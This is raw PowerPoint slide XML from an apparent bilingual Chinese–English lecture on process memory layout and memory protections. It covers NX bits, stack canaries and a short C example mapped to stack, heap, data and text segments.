                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC8C04F7-6D95-4BED-9D59-E69ED3613902}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1492950"/>
              <a:ext cx="358500" cy="6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0" name="Shape 1392">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29CD1FE8-8BC9-4841-B565-DAED513B50DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="2807875"/>
              <a:ext cx="358500" cy="6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1" name="Shape 1393">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB3B58A-F753-4F18-AB6A-B4F842CC0B40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4221500"/>
              <a:ext cx="358500" cy="6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2" name="Shape 1394">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092B6566-C748-4F94-B9BD-E11B297E20AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4495700"/>
              <a:ext cx="358500" cy="6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23" name="Shape 1395">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D994AF33-1178-4AA2-8E26-071FECC7A92A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4362050"/>
              <a:ext cx="1047000" cy="27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r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>0x00000000</a:t>
              </a:r>
              <a:endParaRPr sz="1333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24" name="Shape 1396">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49C1C40A-1462-498C-B4F7-11994D4C9AAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Shape 1397">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB428279-963A-4DC2-BA36-D7F3502EFF53}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 1398">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03347C8C-5395-4B60-B37B-F165EDB80289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192340" y="1831647"/>
            <a:ext cx="4415200" cy="6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" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Writable, Readable, Non-Executable</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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7" name="Shape 1399">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{733A2FD4-B60E-48CD-A9EA-2266621ACC3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192340" y="4538313"/>
            <a:ext cx="4415200" cy="6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" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Writable, Readable, Non-Executable</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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8" name="Shape 1400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC6F853-578C-4DBB-ADEC-721D31748E13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1192340" y="5479513"/>
            <a:ext cx="4415200" cy="6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" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Readable, Executable, Not Writable </a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Shape 1401">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD2957E1-4DAF-4B6B-9355-4B7857D66881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5607540" y="2150247"/>
            <a:ext cx="1373200" cy="76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0" name="Shape 1402">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63F7CCFB-2091-4329-825C-643B71B6B253}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="1"/>
            <a:endCxn id="28" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5607640" y="5413280"/>
            <a:ext cx="1400000" cy="3924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1" name="Shape 1403">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54EA5155-F341-459A-ACE5-A6741C8B6640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631806" y="4684080"/>
            <a:ext cx="197200" cy="440000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Shape 1404">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E90D4DCE-ABF9-44C9-856F-023949D87EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="31" idx="1"/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5607406" y="4864480"/>
            <a:ext cx="1024400" cy="396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3" name="矩形 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C831CD26-2B74-4F61-A046-515D23B3B77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1817080" y="611898"/>
            <a:ext cx="764343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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>The NX bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(the No-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eXecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bits)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/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FC2349D0-5403-4048-92AB-343AD10A9A91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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内存保护措施 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The NX bits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380249995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64D43EEB-4C07-462C-88E5-884E754BC0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5011909" y="2062584"/>
            <a:ext cx="154080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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Canary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64EB43F5-BF87-475E-BC0B-CEACC438595C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2647359"/>
            <a:ext cx="6476989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endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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24292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程序的防护措施，编译时生效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24292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在刚进入函数时，在栈上放置一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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，在函数返回时检测其是否被改变。以达到防护栈溢出的目的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24292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canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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字长，其位置不一定与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292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rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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存储的位置相邻，具体得看程序的汇编操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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24292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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292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fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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-stack-protector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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关掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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canary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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b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</a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US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987AF0A0-4384-4846-B332-AB17C6C6AC5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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内存保护措施 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Canary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124629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29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A9693D-1A5B-4E5E-A51B-AAAE2A96A437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="856352" y="2611497"/>
            <a:ext cx="4346715" cy="3515348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int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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glb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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char* str = “Hello world!”;</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="12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" sz="12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int sum(int x, int y)</a:t>
            </a:r>
            <a:endParaRPr sz="12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2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int t = x + y;</a:t>
            </a:r>
            <a:endParaRPr sz="12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return t;</a:t>
            </a:r>
            <a:endParaRPr sz="12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" altLang="zh-CN" sz="12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2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int main() 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2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2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sum(1, 2);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2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void* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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= malloc(0x100);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2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read(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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, 0x100);  // input “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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deadbeef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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”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2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return 0;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2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2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18" name="Shape 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549B3D12-28A7-40B0-92F4-EE1F883F00A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5203067" y="4369171"/>
            <a:ext cx="1777381" cy="4256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" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D44FFC-1C62-46F9-B4D6-A27301FF655E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5306927" y="3990805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编译链接执行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D87B1B5B-680F-4CD7-9FDB-067A58F33529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2283351" y="1976123"/>
            <a:ext cx="14927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语言源代码</a:t>
            </a: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52E28E50-13F3-4E7B-8ECF-BAA2AB2D90C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6980448" y="1408841"/>
            <a:ext cx="4224176" cy="5172264"/>
            <a:chOff x="6503924" y="1331567"/>
            <a:chExt cx="4790847" cy="5237782"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Shape 740">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{516F7AAC-37C4-4C3D-840A-9E07E25B3D80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6503924" y="1331567"/>
              <a:ext cx="4790847" cy="5237782"/>
              <a:chOff x="4897550" y="1212775"/>
              <a:chExt cx="1363200" cy="3309752"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="Shape 741">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF8E1F0C-1E5C-4FBD-B9EE-136FA129997A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1212775"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Kernel</a:t>
                </a:r>
                <a:endParaRPr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25" name="Shape 742">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB864F51-F08D-48DF-B235-796BF6CF267A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1486975"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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dirty="0"/>
                  <a:t>Stack: </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>t</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1"/>
                  <a:t>ptr</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Shape 743">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D882F786-2C4C-4F15-939C-B6D8F7527EF3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1761175"/>
                <a:ext cx="1363200" cy="603900"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 744">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34BA1D80-E668-46C6-992A-B6C7FDCB5A4C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2365075"/>
                <a:ext cx="1363200" cy="442800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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="Shape 745">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DBC97EC-4122-4EE0-99A7-3C6A101DBC68}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2807875"/>
                <a:ext cx="1363200" cy="603900"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 746">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B12AF7-6ABB-4F71-9EE5-2CDB56246F49}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3158070"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap: “</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" err="1"/>
                  <a:t>deadbeef</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>”</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Shape 747">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827A47B3-3393-43CF-BB19-F65D412C5CA8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3699927"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data: </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>str</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Shape 748">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12B2411C-343C-466F-B821-23AADDFBB0A7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3974127"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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dirty="0"/>
                  <a:t>Text: main</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" dirty="0"/>
                  <a:t>sum</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>、</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" dirty="0"/>
                  <a:t>“</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>Hello </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                  <a:t>world!”</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" dirty="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32" name="Shape 749">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5AFB405-9397-4105-9E7C-9D8FF80A0AEE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4248327"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
